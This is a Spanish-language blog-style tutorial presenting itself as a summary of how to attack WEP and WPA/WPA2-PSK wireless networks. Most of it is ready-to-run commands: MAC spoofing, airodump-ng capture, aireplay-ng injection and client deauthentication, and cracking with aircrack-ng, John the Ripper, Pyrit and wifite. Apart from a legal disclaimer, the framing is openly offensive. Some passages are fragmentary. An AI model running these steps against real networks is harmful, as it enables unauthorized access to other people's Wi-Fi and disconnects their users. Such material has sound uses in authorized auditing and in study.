Wauuu lo que puede hacer un simple Script , volver loca a una mujer! .Una vez más demostrado que un informático también tiene su corazoncillo y que es un buen conquistador!!! :p.
Bueno volviendo al mundo malévolo y dejando la cursileria de lado , les presentaré un resumen de como atacar una Wireless con seguridad WEP y WPA/WPA2/PSK.
" A
continuación se ponen en conocimiento de los artículos del Código Penal
del Reino de España que existe la posibilidad de que sean vulnerados si se
diese un uso uso
fraudulento de las comunicaciones inalámbricas. El autor no se hace responsable
del uso de los conocimientos adquiridos o aquí descritos. "
Conociendo las normas legales continuaremos...
Para esto a manera de concepto existen diversos tipos de ataques sobre una Wi-Fi :
*Eavesdropping
*Defraudación de comunicaciones
*Hijacking
*Man in the Middle.
*Denial of Service & Distributed D.O.S
*Spam/ Span over Voice over IP (SPIT)
*Ejecución remota de código arbitrario.
Empezando con algunos comandos en Linux :
-Viendo
dispositivo inalámbrico y activandolo.
ifconfig
ifconfig
wlan0 up
-Listando
redes inalámbricas
disponibles.
iwlist
wlan0 scan
-Conectandose a
una red Wirless
iwconfig wlan0 essid WifiDestroyer
-Opteniendo direccion
IP.
dhclient3 wlan0
Instalación en Linux de
herramientas Wireless:
• Normalmente viene instalado pero si no hay que instalarlo
manualmente.
• Paquete “wireless-tool”.
sudo
apt-get install wireless-tools
• Comprobar chipset
lspci | grep Network
lsusb | grep Wireless
• Instalación de Suite Aircrack-ng
sudo
apt-get install aircrack-ng
Airmon-ng:
cambio
de modo de NIC.
EJEMPLOS BÁSICOS:
•To
start wlan0 in monitor mode:
airmon-ng start wlan0
•To
start wlan0 in monitor mode on channel 8:
airmon-ng start wlan0 8
•To
stop wlan0:
airmon-ng stop wlan0
•To
check the status:
airmon-ng
Cambio de la MAC pasos:
#airmon-ng //viendo la interfaz que usamos
#airmon-ng stop wlan0 //detenemos el modo monitor
#ifconfig wlan0 down //tiramos nuestra interface
#macchanger --mac 02:11:22:33:4B:5A wlan0 //cambiando la mac a 02:11:22:33:4B:5A
#airmon-ng start wlan0 //iniciamos el modo monitor nuevamente.
Nota:existen un sin numero de herramientas que practicamente automatizan el cambio de la
MAC :
•MAC
Address
Changer:
(Windows)
•Technitium MAC Address
Changer: (Windows)
http://www.technitium.com/tmac/index.html
A)Buscando Redes empezando ATAQUE WEP:
#airodump-ng wlan0 //escaneando redes, para detener : Ctrl + C
#airodump-ng -c 1 -w underc0de --bssid 4A:2C:56:33:76:5E wlan0 //canal : 3, capturamos
datas [no cerrar terminal]
Asociándonos a la Red (abrimos otro terminal)
#aireplay-ng -1 0 -a 4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A -e WifiDestroyer wlan0
Si nos aparece algun tipo de error puede ser por lo siguiente:
-La red a la que quieres atacar está muy lejos.
-Tu tarjeta de red no puede hacer inyección de paquetes.
-el router tiene seguridad para evitar este tipo de ataques.
Inyectando tráfico (en el terminal anterior)
#aireplay-ng -3 -b 4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A wlan0
Desencriptando el password (abrimos un tercer terminal )
#aircrack-ng underc0de-01.cap
Con esto al termino del desencriptado nos mostrara el password.
B) ATAQUE WPA/WPA2/PSK:
Colocamos nuestra interfaz en modo monitor de la misma forma que en el caso del Ataque
WEP.
Capturando el HANDSHAKE
#airodump-ng mon0 //escaneando redes, para detener : Ctrl + C
#airodump-ng mon0 --channel 1 --bssid 4A:2C:56:33:76:5E -w /tmp/wpa2 //nos aparece una
imagen de la red de clientes conectados
Abrimos otro terminal y en el colocamos lo siguiente:
#aireplay-ng -0 1 -a 4A:2C:56:33:76:5E -c 70:F1:A2:95:T4:5D mon0 // 70:F1:A2:95:T4:5D :
MAC del cliente
Ejecutado el comando, en el terminal anterior aparecerá en la parte superior derecho el
Handshake.
Por ultimo desencriptaremos el password pudiendo hacerse de dos formas con :
*Fuerza Bruta con el John the Ripper.
*Por medio de Diccionario.
Obteniendo el Password
Utilizando el diccionario
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 4A:2C:56:33:76:5E /tmp/wpa2*.cap
Utilizando el john the ripper
# /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b 4A:2C:56:33:76:5E -w -
/tmp/wpa2*.cap
Ahora sólo nos queda esperar en vista que el tiempo es proporcional a la dificultad del
password.
Existe una herramienta que también es muy recomendable por su automatización y por el
tiempo que nos ahorrará ,siendo muy usada en las auditorias.
WIFITE es una herramienta que esta desarrollada en Python y que nos permitirá realizar
ataque WEP y WAP al mismo tiempo, para esto lo descargamos :
#wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
#chmod +x wifite.py
ejecutamos la aplicación
#./wifite.py
Lo que viene a continuación es sólo seguir la instrucción del programa que prácticamente
trabajará al punto que nos brindara directamente el password de la red atacada.
David
Hulton,
permite alquilar en su web alquilar por pocos dólares, clusters
de tarjetas
Si
se dispone de tarjetas gráficas compatibles, se pueden utilizar herramientas
que son
capaces de procesar el ataque en los núcleos de las propias GPUs.
Por ejemplo, con
En
Linux, se puede usar Pyrit. Este programa permite crear
Bases de datos masivas de
hashes precalculados de passwords.
Para ello hace uso de los multiples cores
de una
maquina y de algunas tarjetas graficas como ATI-Stream,
Nvidia
CUDA and OpenCL.
Es el ataque más potente que se puede hacer actualmente para ataques de fuerza
bruta.
Comandos:
pyrit -r captura_WPA_Wifilabs.pcap-01.cap
-i dict.txt -b 1c:7e:e5:fd:08:f8
attack_passthrough
-r
à fichero de captura de Handshake
-i
à Dicccionario
-
b à BSSID de la red
attack_passthrough